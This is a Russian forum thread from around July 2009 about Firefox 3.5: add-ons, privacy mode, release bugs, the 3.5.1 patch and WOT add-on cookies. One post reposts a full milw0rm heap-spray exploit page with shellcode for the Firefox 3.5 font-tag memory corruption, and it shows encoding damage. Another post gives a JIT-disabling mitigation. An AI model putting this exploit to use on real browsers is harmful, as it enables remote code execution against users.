Плагины к Firefox

[p2u 824]

У меня Опера стоит ещё(вот разрываюсь между двумя браузерами какой выбрать),там рубится всё(если задать в настройках,можно заблокировать любой элемент на странице),и именно не грузится.

Но это не в тему уже.

Возможно вас удивит то, что я сейчас скажу, но пользуйтесь Оперой по умолчанию. При этом ОБЯЗАТЕЛЬНО тестируйте новый Firefox 3.5. Он быстрый как никогда раньше и Private Browsing более, чем интересно, по крайне мере для меня.

Paul

[TANUKI 240]

@Paul

Для поддержания общения отметим Вышел Firefox 3.5

Firefox 3.5 is now available for download

http://www.mozilla.com/en-US/firefox/all.html

Примечания к выпуску

Спасибо за новость

Но где же ажиотаж по поводу столь важного события? Че-то как-то не заметно. Интересно, будет новый рекорд по скачиванию...

Паул, подскажите пожалуйста "правильные" настройки новой Лисы Там ведь много нового

[chap 0]

Paul. Вот посмотрите пожалуйста скрин,что у меня не так.

У меня по умолчанию стоит ИЕ(с прокси 0.0.0.0(Вам спасибо за совет) и 99 портом),Опера 10 турбо- нравится,быстрая,удобная(можно подстраивать под себя как хочешь).Лиса у меня 3.5(сегодня ночью обновил, до этого RCы были),приват режим класс,почему они давно его не сделали-загадка.Немного неудобно с кешем-как его посмотреть можно,может какое-то дополнение есть,нажал кнопку и кеш на ладони.Вот так бы было удобно.

Отредактировал Июль 1, 2009 chap

[p2u 824]

Паул, подскажите пожалуйста "правильные" настройки новой Лисы Там ведь много нового

'Правильные' для каждого по-разному (я, например, работаю только в 'порно-режиме'), но мои основные настройки находятся в сообщениях 75 и 78 данной темы.

Paul

[Zilla 340]

Но где же ажиотаж по поводу столь важного события? Че-то как-то не заметно. Интересно, будет новый рекорд по скачиванию...

Ажиотаж развеяли RC версии) Кто хотел, то на них уже пересел ещё раньше..

[SFD 60]

Без ажиотажа. Короткий видеоролик ( на англиском)

[TANUKI 240]

Поставил, конечно. Честно говоря, особо не впечатлен. Нет, все как бы нормально, но что прогрессивного?

Приватный браузинг? так это можно было и в 3-ке делать. просто приходилось галки ставить-убирать в меню "Приватность", а тут, типа, все одной кнопкой делается - тоже мне прогресс

Виде смотреть без установки адобовских плагинов? Так у меня они уже стоят - ведь раньше я сидел на 3-ке, так что опять же - не вижу прикола...

Что еще полезного?

Из ролика вижу геолокацию, но это сомнительная штука в плане приватности.

Скорость загрузки страниц? ну у меня инет нормальный - разницы не чувствую...

Эх.... А дыр небось опять будет куча, как окажется...

[SFD 60]

@TANUKI

Из ваших сообщений следует, что человек вы любознательный и если я не ошибаюсь, имеете отношение к журналистике.

Наверняка, знакомы с понятием "Эффект завышенного ожидания". Надо спокойно воспринимать цифры в наименовании как стремление к поступательному развитию, не делая акцент на революционных преобразованиях. О всех недоработках уже известно, и 7 июля планируется следующий шаг Firefox 3.5.1.

Если возникнет интерес к информации ( на английском), могу привести ссылку.

[p2u 824]

Всего 55 багов записно уже. У меня проблем нет, но это, скорее всего, потому что буквально всё отключено кроме Private Browsing.

Pau

[Zilla 340]

По мне так одно большое изменение в 3.5 это сильное увеличение скорости как самого FF так и его движка. Остальные фичи мне по баробану.

[p2u 824]

сильное увеличение скорости

Он тоже с большой скоростью падает у многих. Многие проблемы с видео и со скриптами определённого типа, с дополнениями, короче как всегда. Грустно смотреть, когда срок сдачи важнее, чем качество продукта. Это новая тенденция такая.

Paul

[p2u 824]

Повреждение памяти в Mozilla Firefox.

Программа: Mozilla Firefox 3.5, возможно другие версии.

Опасность: Высокая

Наличие эксплоита: Да

Описание:

Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за ошибки при обработке JavaScript кодом HTML тегов, например при обработке тега font. Удаленный пользователь может с помощью специально сформированного Web сайта вызвать повреждение памяти и выполнить произвольный код на целевой системе.

URL производителя: www.mozilla.com/firefox

Решение: Способов устранения уязвимости не существует в настоящее время.

Пользуемся NoScript и как всегда ничего не будет. Кому интересно: эксплойт выложили на milw0rm.com

Paul

[Deja_Vu 366]

Кому интересно: эксплойт выложили на milw0rm.com

<html><head><title>Firefox 3.5 Vulnerability</title>Firefox 3.5 Heap Spray Vulnerabilty</br>Author: SBerry aka Simon Berry-Byrne</br>Thanks to HD Moore for the insight and Metasploit for the payload<div id="content"><p><FONT>                             </FONT></p><p><FONT>Loremipsumdoloregkuw</FONT></p><p><FONT>Loremipsumdoloregkuwiert</FONT></p><p><FONT>Loremikdkw  </FONT></p></div><script language=JavaScript>/* Calc.exe */var shellcode = unescape("腝ۭ言ኅࠀ" +                         "痀ኅ쀉ၴ੪" +                         "薍Ĕڕ愀쀱쒉썐" +                         "赠ʽ㄀냀搰‹䂋謌᱀" +                         "‹䂋욉㾃琀嘷㏨" +                         "ऀ瓀ꬫ잃茄?᝴偀" +                         "闿Ă쀉ቴ욉똏ć㇍" +                         "䃀䒉ᰤ썡쀱譠⑄̤㱀" +                         "䂍贘恀㢋剴簃␤例謘" +                         " 尃␤䧼䁼㒋΋⑴ㄤ駀" +                         "ࢬ瓀섇߂숁吻⠤型" +                         "̤⑔༤ҷ셊ˠ型̜⑔謤" +                         "င䐃␤䒉ᰤ쉡쀱" +                         "ჟ鈱退慣捬" +                         "攮數退");/* Heap Spray Code */            oneblock = unescape("ఌఌ");var fullblock = oneblock;while (fullblock.length<0x60000)  {   fullblock += fullblock;}sprayContainer = new Array();for (i=0; i<600; i++)  {   sprayContainer[i] = fullblock + shellcode;}var searchArray = new Array()function escapeData(data){var i;var c;var escData='';for(i=0;i<data.length;i++) {  c=data.charAt(i);  if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape©;  escData+=c; }return escData;}function DataTranslator(){   searchArray = new Array();   searchArray[0] = new Array();   searchArray[0]["str"] = "blah";   var newElement = document.getElementById("content")   if (document.getElementsByTagName) {       var i=0;       pTags = newElement.getElementsByTagName("p")       if (pTags.length > 0)         while (i<pTags.length)       {           oTags = pTags[i].getElementsByTagName("font")           searchArray[i+1] = new Array()           if (oTags[0])             {               searchArray[i+1]["str"] = oTags[0].innerHTML;           }           i++       }   }}function GenerateHTML(){   var html = "";   for (i=1;i<searchArray.length;i++)   {       html += escapeData(searchArray[i]["str"])   }    }DataTranslator();GenerateHTML()</script></body></html><html><body></body></html># milw0rm.com 

[p2u 824]

Проблема в Just-in-time (JIT) JavaScript compiler, который только работает в Firefox 3.5.

Если на доверенной странице в NoScript выложили эксплойт, то тогда защиты не будет. Временное решение до выпуска патча:

1) в адресную строку набрать about:config (нажать 'Enter')

2) В окне 'Фильтр' набрать jit

3) Дважды щёлкать на параметр javascript.options.jit.content так, чтобы он от True изменился на False.

Mozilla Security Blog

Paul

[p2u 824]

Могу ещё "порадовать": найдена вторая серьёзная дыра. Подробности пока только на английском:

Mozilla Firefox 3.5 Unicode Data Remote Stack Buffer Overflow Vulnerability

Eploit.

Paul

[p2u 824]

Firefox 3.5.1 (выбираем там свой язык). Можно так скачать пока не все зеркала получили это обновление.

Release Notes.

Внимание! Исправлена только первая уязвимость (сообщ. 112). FF 3.5.1 планировалась на самом деле к концу июля, так что: готовимся к новым багам (синдром 'не отставать от Google Chrome и IE8').

Paul

[SFD 60]

Firefox 3.5.1 можно также взять отсюда,

http://forum.mozilla-russia.org/viewtopic.php?id=37296

[mikh 15]

Внимание! Исправлена только первая уязвимость (сообщ. 112). FF 3.5.1 планировалась на самом деле к концу июля, так что: готовимся к новым багам (синдром 'не отставать от Google Chrome и IE8').

Paul

Но javascript.options.jit.content уже можно снова выставлять на true?

[p2u 824]

Но javascript.options.jit.content уже можно снова выставлять на true?

Говорят, что да. Если этого не делать, то тогда ява-скрипт будет работать как в 'старых' версиях 3.x (то есть: без этого JITa). Мне, например, так спокойнее...

Paul

[TANUKI 240]

Я могу ошибаться, но в 3,5 вроде как обещалось (или мне показалось) поддержка java и flash сразу (из коробки, так сказать...), но вот я ставлю свежий браузер 3,5, захожу на Ютьюб, а он мне пишет - загрузите плеер - не могу вам видео показать

Или я что-то не так понимаю?

[SBond 253]

Я могу ошибаться, но в 3,5 вроде как обещалось (или мне показалось) поддержка java и flash сразу (из коробки, так сказать...)

Хм, если я тоже не ошибаюсь там только добавлена поддержка HTML5( теги на видео и аудео), и добавили видеокодек Ogg Theora и аудиокодек Vorbis.

На сколько кодеки нужны были, трудно судить, мне вот лично эта "фишка" была вовсе ненужна...

[Начальник Чукотки 110]

С Firefox'ом снова нелады:

http://www.securitylab.ru/news/382871.php

[TANUKI 240]

С Firefox'ом снова нелады:

http://www.securitylab.ru/news/382871.php

Я уже как-то даже пообвык Главное, чтопают оперативно

[Начальник Чукотки 110]

Я уже как-то даже пообвык

Я тоже

Теперь снова о дополнениях

Есть вот такое дополнение: https://addons.mozilla.org/ru/firefox/addon/3456

Показывает репутацию сайтов (что-то типа того).

Но вот странно: у меня в Файрфоксе отключены кукисы,но это дополнение поставило в Firefox свои кукисы Я их удаляю,а они снова при запуске браузера появляются. Нажимаю: "показать сookies",и там написано mywot.com и рядом плюсик.

Нажимаю на плюсик и вижу следующее:

mywot.com auth

mywot.com nance

mywot.com id

mywot.com partner

mywot.com accessible

Может это какая-то "шпионская штука"?

Или это у меня паранойя?

[p2u 824]

@ Начальник Чукотки

WOT так работает - это что-то типа облачная технология, скажем так - статус посещаемого сайта проверяется в он-лайне на основании баз, которые 'дома' у них. Если вы хотите пользоваться WOTом, то тогда советую всё-таки разрешить эти куки - это частично для создания вашего профиля и правил WOTa. Вы создаёте правила не только для себя - другие будут тоже (анонимно) знать, сколько пользователей там было и что они думают о том или ином сайте.

P.S.: Есть ещё дополнения, которые принудительно обходят запреты не куки (Video Download Helper по-моему).

Paul